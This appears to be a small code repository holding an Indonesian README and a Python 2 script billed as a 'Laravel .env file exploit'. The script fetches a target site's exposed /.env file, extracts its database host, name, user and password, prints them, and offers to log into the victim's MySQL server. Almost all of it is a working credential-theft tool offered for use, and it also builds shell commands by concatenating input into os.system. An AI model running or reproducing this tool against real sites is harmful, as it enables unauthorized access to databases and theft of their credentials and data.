├── README.md
└── laravel.py


/README.md:
--------------------------------------------------------------------------------
 1 | # laravelExploit
 2 | Exploit laravel database config<br>
 3 | Yang perlu di install sebelum menjalankan tool:<br>
 4 | - modul requests python 2.7<br>
 5 | - mysql-server(kalau pake debian/ubuntu)<br><br>
 6 | Tool ini sudah auto konek ke mysql server<br>
 7 | usage:<br>
 8 | python laravel.py http://target.com/[path]<br>
 9 | python laravel.py http://target.com/
10 | 


--------------------------------------------------------------------------------
/laravel.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | 
 4 | import requests
 5 | import re
 6 | import sys
 7 | import time
 8 | import os
 9 | 
10 | banner = """
11 | ===================================================
12 | =              LARAVEL .ENV FILE EXPLOIT          =
13 | =          AUTHOR : SECURITY007                   =
14 | ===================================================
15 | """
16 | 
17 | def exp(host):
18 | 	hh = host+"/.env"
19 | 	req = requests.get(hh)
20 | 	cek_status = req.status_code
21 | 	cari = req.text
22 | 	if (cek_status == 200):
23 | 		print "[+] Vuln"
24 | 		time.sleep(1)
25 | 		print "[+] Menerima info database"
26 | 		time.sleep(1)
27 | 		try:
28 | 			hostnya = []
29 | 			gethost = re.findall("DB_HOST=(.*?)\n",cari)
30 | 			getdb = re.findall("DB_DATABASE=(.*?)\n",cari)
31 | 			getuser = re.findall("DB_USERNAME=(.*?)\n",cari)
32 | 			getpassw = re.findall("DB_PASSWORD=(.*?)\n\n",cari)
33 | 			dbhost = gethost[0]
34 | 			if (dbhost == "localhost" or dbhost == "127.0.0.1"):
35 | 				a = hh.split("/")
36 | 				b = a[2]
37 | 				e = hostnya.append(b)
38 | 			show = """
39 | ===================[Database Info]======================
40 | = [Host]     : """+hostnya[0]+"""
41 | = [Database] : """+getdb[0]+"""
42 | = [User]     : """+getuser[0]+"""
43 | = [Password] : """+getpassw[0]+"""
44 | ========================================================
45 | 		"""
46 | 		
47 | 			print show
48 | 		except KeyboardInterrupt:
49 | 			print req.text
50 | 			
51 | 		time.sleep(1)
52 | 		konek = raw_input("[+] Mau konek ke mysql server ? [y/n] ")
53 | 		if (konek == "y"):
54 | 			os.system("sudo apt-get install mysql-server")
55 | 			print "\nLogin MySql"
56 | 			ip = raw_input("Host : ")
57 | 			os.system("mysql -h "+ip+" -D "+getdb[0]+" -P 3306 -u "+getuser[0]+" -p ")
58 | 		else:
59 | 			print "[-] Bye.."
60 | 	else:
61 | 		print "[-] Not Vuln"
62 | 			
63 | 		
64 | 		
65 | def main():
66 | 	print banner
67 | 	if (len(sys.argv) == 2):
68 | 		exp(sys.argv[1])
69 | 	else:
70 | 		print "Usage python "+sys.argv[0]+" http://vuln.com/<path> "
71 | 
72 | if __name__ == "__main__":
73 | 	main()


--------------------------------------------------------------------------------